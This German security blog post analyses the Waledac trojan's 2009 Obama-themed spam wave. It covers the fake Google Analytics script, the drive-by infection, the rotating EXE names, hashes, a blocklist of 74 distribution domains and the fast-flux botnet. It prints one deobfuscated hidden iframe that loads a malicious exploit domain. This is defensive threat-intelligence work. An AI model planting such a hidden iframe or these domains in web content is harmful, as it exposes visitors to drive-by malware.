Tag Archive for 'googl-status.com'

Waledac: Ein kleiner Ãœberblick

Bereits seit Ende des letzten Jahres tummelt sich ein Trojaner Namens Waledac im Internet herum. Da der Trojaner jedoch nicht explizit auf Schweizer Internet User abzielt, habe ich bisher auch keinen Blog-Post dazu geschrieben. Aus aktuellem Anlass (Amtsantritt von Barack Obama) möchte ich hier jedoch trozdem kurz etwas über den Trojaner schreiben.

Der Trojaner verbreitete sich bereits über mehrere Spam-Wellen:

  • Greeting Cards
  • Merry Christmas Card
  • Happy new year Card
  • Barack Obama has refused to be a president

Die Spam-Mails sind/waren jeweils in englisch verfasst und gingen, wenn auch nur vereinzelt, auch an Schweizer E-Mail Empfänger. In der neusten Spam-Welle, welche seit vergangenem Sonntag 18. Januar 2009 unterwegs ist, behauptet das Spam-Mail, dass Barack Obama nicht als President der Vereinigten Staaten antreten werde. Die Spam-Mails enthalten jeweils einen Link auf eine Webseite, welche schlussendlich den Trojaner verbreitet.

Beispiel aktuelle Spam-Welle

waledac_obama

Klickt der Besucher auf der Webseite auf einen Link, liefert diese dem Besucher ein EXE-File, in welchem sich der Trojaner Waledac befindet. Interessant ist jedoch folgender JavaScript Code, welcher sich auf sämtlichen Webseiten, welche den Trojaner verbreiten, befindet:

malicious_js_obama

Der Quellcode der Webseite verweist auf eine vermeidliche JavaScript-Datei, welche angeblich zu Google Analytics gehört . Schaut man sich jedoch den JavaScript Code der Datei google-analysis.js an, kommt ein obfuscated JavaScript Code zum Vorschein:

obfuscated_js_obama

Deobfuskiert man den JavaScript Code, kommt ein Iframe zur Domain googl-status.com (74.200.80.10) zum Vorschein:

<\iframe src="http://googl-status.com/jobs/direct.php?eb0h" style="display:none">

Schauen wir uns den Quellcode von googl-status.com an, erkennen wir ziemlich rasch, dass es sich dabei um Drive-By exploits handelt.

Kurz gesagt: Die von Waledac für die verbreitung des Trojaners genutzen Webseiten versuchen dem Besucher gleich auf zwei Arten den Trojaner unter zu jubeln: Einmal als normaler Datei download und einmal per Drive-By infection. Somit reicht das blosse anschauen der Webseite, um mit dem Trojaner infiziert zu werden. An dieser Stelle gilt es auch noch zu erwähnen, dass sich der Name des angebotenen EXE-Files bei jedem Besuch ändert:

  • readme.exe
  • statement.exe
  • barackblog.exe
  • doc.exe
  • obamaspeech.exe
  • blog.exe
  • barack.exe
  • usa.exe
  • baracknews.exe
  • pdf.exe
  • news.exe
  • obamasblog.exe
  • president.exe
  • obamanews.exe

Die Erkennungsrate des Trojaners ist mittlerweile sehr gut:

Filename: barackblog.exe
File size: 395776 bytes
MD5…: e32bd572f87625db9df7359af571c06e
SHA1..: 6e5f468b773a06f2e94fa096564d6fbdd6fff14c
Erkennungsrate: 23/39 (58.97%)

Zur Zeit sind mir 74 Domains bekannt, welche den Trojaner verbreiten und welche es zu blockieren gilt:

yourdecember.com
directchristmasgift.com
livechristmasgift.com
cheapdecember.com
justchristmasgift.com
bestchristmascard.com
blackchristmascard.com
christmaslightsnow.com
decemberchristmas.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
livechristmascard.com
superchristmasday.com
superchristmaslights.com
whitewhitechristmas.com
yourchristmaslights.com
newyearcardonline.com
newyearcardcompany.com
bestyearcard.com
youryearcard.com
newmediayearguide.com
superyearcard.com
cardnewyear.com
mirabellaclub.com
mirabellaonline.com
newlifeyearsite.com
newyearcardfree.com
newyearcardservice.com
themirabelladirect.com
themirabellahome.com
smartcardgreeting.com
yourregards.com
yourmirabelladirect.com
worldgreetingcard.com
topgreetingsite.com
themirabellaguide.com
mirabellanews.com
mirabellamotors.com
lifegreetingcard.com
greetingsupersite.com
greetingguide.com
greetingcardgarb.com
greetingcardcalendar.com
greatmirabellasite.com
eternalgreetingcard.com
bestmirabella.com
greatobamaguide.com
superobamaonline.com
superobamadirect.com
greatobamaonline.com
wapcitynews.com
bestbarack.com
bestbaracksite.com
bestobamadirect.com
expowale.com
greatbarackguide.com
jobarack.com
thebaracksite.com
topwale.com
waledirekt.com
waleonline.com
waleprojekt.com
goodnewsdigital.com
goodnewsreview.com
linkworldnews.com
reportradio.com
spacemynews.com
worldnewsdot.com
worldnewseye.com
worldtracknews.com

Die Domains werden auf dem Waledac Botnet gehostet (FastFlux). Ein paar der Domains sind bereits offline.

Ist ein Rechner einmal infiziert, kommuniziert er über HTTP mit andern infizierten Rechner (eine Art HTTP2p, siehe Shadowserver.org). Somit gibt es keinen eigentlichen fixen Command & Control Server (C&C), auf welchen man den Zugriff unterbinden könnte. Nach einer gewissen Zeit werden die infizierten Rechner dann als FastFlux bots missbraucht, um die oben genannten Domains zu hosten.

Das Grundsätzliche Verhalten des Trojaner erinnert uns an den Storm Worm, welcher ebenfalls FastFlux sowie eine P2P-Technik verwendet hatte.

Waledac FastFlux Botnet

Schauen wir uns das Waledac FastFlux botnet etwas genauer an:

Die Waledac Domains werden Single Flux mit einer Time to live (TLL) von 0 Sekunden gehostet:

dig bestbarack.com

;; ANSWER SECTION:
bestbarack.com. 0 IN A 60.164.102.218

Im Zuge des abuse.ch FastFlux Tracker beobachte ich nun schon seit Ende des letzten Jahres das FastFlux Botnet, welches die Waledac Domains hosten. Das Tracking System hat bereits über 11’828 infizierte Rechner gefunden, welche als FastFlux Bots missbraucht werden. Somit schafft es das Waledac FastFlux botnet innert kurzer Zeit (knapp einen Monat) auf Platz drei der zehn grössten FastFlux Botnetze:

biggest_botnets09jan

Quelle: dnsbl.abuse.ch/statistic/fastflux.php

Was nicht verwundert ist die geografische Verteilung der Infizierten Rechner:

waledac_botnet_location

Rund 25% der Bots stammen aus den USA. Die Schweiz ist mit 44 Infizierten Rechner vertreten, welche sich zum grössten Teil im Netz der Cablecom befinden:

cablecom_waledac

Quelle: dnsbl.abuse.ch/fastfluxtracker.php?asn=8404. Die Liste enthält auch IP, welche anderen Botnetze angehören.

Was es zu beachten gibt, ist, dass viele IP Adressen dynamisch vergeben werden und somit die Zahl der tatsächlich infizierten Rechner unbekannt ist.

Fazit

Der Trojaner Waledac ist eine globale Bedrohung, welche jedoch vor allem in der USA auf Opfer stösst und die Schweiz bis an hin nur leicht gestreift hat. Trotzdem empfiehlt es sich, die oben genannten Waledac Domains an den Unternehmens-Gateways bzw. Proxy-Servern zu blockieren.

Weitere Informationen zu Waledec gibt es unter folgenden Links (Englisch):




economics-recluse
Scene
Urgent!